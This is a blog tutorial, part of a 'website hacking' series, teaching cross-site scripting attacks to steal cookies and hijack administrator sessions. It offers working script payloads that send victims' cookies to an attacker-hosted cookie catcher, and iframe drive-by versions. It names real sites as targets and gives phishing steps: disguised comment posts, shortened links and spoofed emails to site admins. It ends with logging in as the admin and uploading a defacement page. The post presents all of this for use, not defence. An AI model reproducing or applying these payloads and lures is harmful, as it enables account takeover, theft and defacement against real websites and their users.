Thursday, 7 March 2013

Website Hacking : Basic XSS tutorial for website hacking Part 3


As we had discussed about How to find a vulnerable Website? and Basic information of website hacking in my previous two article. Today i am writing this Part3 article on "Basic XSS Tutorial For Website Hacking".

Today in this article, I am going to teach you how to hack website using XSS. In this article i have shared Cookie Catcher page, which is used for catching cookies.

If you have not read part 1 and part 2, I strongly recommend you read both my articles for learning more about Website Hacking....

Basic Information About Website Hacking Part 1

How to find a vulnerable Website?? Part 2



What is XSS ???

Also known as Cross Site Scripting, regarded as the second biggest web hazard next to Sqli. It can be found in so many big websites. It is basically client sided code being inserted into webservers which is then saved and displayed to people viewing the website. Similiar to a deface. It occurs through lazily coded webpages and applications.

XSS is in 2 Types


- Persistent 
- Non-Persistent

In this article I will cover both types Persistent and Non-Persistent type. For XSS we will use something called a Cookie Catcher.


Question will be that why we would need someones else cookies?


The answer is that we can change our browser's cookies to login as them!!!So lets call it Session Hijacking.


First go to a free hosting site like http://www.110mb.com/ or any other php hosting sites and register there. Then download this cookie catcher and upload it.


You can find cookie catcher on web


What does the cookie catcher do?

It grabs the user's:
Cookies
IP
Referral Link. Which Page is attached to that Link
Time And Date

Find Vulnerable Sites :

Now first we need to find sites that are vulnerable to XSS so it will work on them.

To test it we will need to add a code after the link.

[ I will use this site that many of you probably saw it before. http://www.smartserials.com/search_serial.php?serials=<script>document.location=%22http://www.alirezabatemi.byethost13.com/cookie.php?c=%22%20+%20document.cookie</script> ]


Now for testing If a site is vulnerable or not you can add these codes:


Code:

"><script>alert(document.cookie)</script>

Code:

'><script>alert(document.cookie)</script>

Code:

"><script>alert("Test")</script>

Code:

'>&ltscript>alert("Test")</script>

Some new one which you can use to inject HTML:


Code:

"><body bgcolor="FF0000"></body>

Code:

"><iframe src="www.google.com" height=800 width=800 frameborder=1 align=center></iframe>

Then if we see a java script popup Or if you used my testing and you saw the page's background go black or a page of google opens in that site it means its vulnerable to XSS attack.


Note :

          The site Needs to have cookies supported! a blank javascript means you need to go to another site.

In the end, if your site is http://www.example.com

The link to test it would be: 
http://www.example.com/index.php?id="><script>alert(document.cookie)</script>

Persistent XSS :


By using this method we can grab the slave's cookies with no suspection and completely stealth.


Now assume we have a forum which has HTML enabled or a site which has a comment page which is vulnerable to XSS.


Ok now lets go to this site: http://www.turkishculturalfoundation.org/search.php?search=

Now test and see if the XSS vulnerable test work on it.
It does!!! And your getting one of the vulnerability's symptoms. So now lets try to grab it's cookies. If there is a box to type or submit it, add this:

Code:

<script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

Note : Change URL (www.you.110mb.com/cookie catcher.php )as per your cookie catcher file url


and submit that post in the forum or the comment box also its good to add something before adding the code like: hey i got a problem logging in???

so they wont suspect you.

Refresh the page, now go to the newly created page, in the same directory as you saved your cookie catcher.php search for cookies.html which is a new file that show you the cookies. Like if your cookie catcher link would be: http://www.example.com/cookie catcher.php

The container of the cookies would be: http://www.example.com/cookies.html

Now visit cookies.html and you would see the session of that cookie!


This is another way for a cookie grabbing drive by, add this code and post it:


Code:

<iframe frameborder=0 height=0 width=0 src=javascript:void(document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie)</iframe>

Then post it in the forum or the comment box.

Now this will open a iframe in the page which will allow you to have the same page in that website. If you don't know about iframes make a new html file in your computer and just do a <iframe src="www.google.com"></iframe> and you will understand iframes more Smile

Note : The site Needs to have cookies supported! a blank javascript means you need to go to another site.


Non-Persistent XSS :


In this method we will make the slave admin go to our link. First we will pick a XSS vulnerable site. For this method we will need a search.php which that page is vulnerable to XSS and has cookies in that page. In the vulnerable search.php in the textbox for the word to search for type:


Code:

<script>alert(document.cookie)</script >

And click the search button. If you see a javascript popup means its vulnerable to Non-Persistent XSS attack. Ok now we will do something similar.

I will use this link for this method: http://www.turkishculturalfoundation.org/search.php?search=

Now in front of the search.php?search= add this:


Code:

"><script>document.location="www.you.110mb.com/cookie catcher.php?c=" + document.cookie</script>

Note : Change URL (www.you.110mb.com/cookie catcher.php )as per your cookie catcher file url


Now go to http://www.spam.com and shrink the whole page's link. Try to find a site administrator's E-mail in that vulnerable website and send a Fake Mail from a online fake mailer like this one: http://emkei.cz/


Now in the body just tell something fake like: Hey i found a huge bug in your website! and give him the shrinked link of the search.php which you added the code in front of it to him. so the spam will mask it and once he goes to the link you will see his cookies in your cookies.html and he will just be redirected to the link in your cookies catcher. No matter what he does and changes his password you can still login as him.


Session Hijacking :


Now you have the Admin's cookies either way, so we need to edit our own browser's cookies. First go to that page's admin login or its main page and delete ALL of your cookies from that page. Now go in your cookies.html page and copy everything in front of the Cookie: in a note open Notepad. The ; separates cookies from each other so first copy the code before the ; .

Now go in that vulnerable website and clear the link. Instead of that link add this:

Code:

Javascript:void(document.cookie="")

or for an example:


Code:

Javascript:void(document.cookie="__utma=255621336.1130089386.1295743598.1305934653.1305950205.86")

Then visit the link. Do this with all of the cookies and refresh the page. And you are logged in as administrator. So now go in your Admin Panel and upload your Deface Page. Now you have Hacked a Website with XSS.


So friends, I hope you will like this

Basic XSS Tutorial For Website Hacking.... 
I have personally tested this Website Hacking Tutorial and found all are working. If you have any problem in above Website hacking Using XSS Tutorial, please mention it in comments section.

Enjoy Website Hacking ........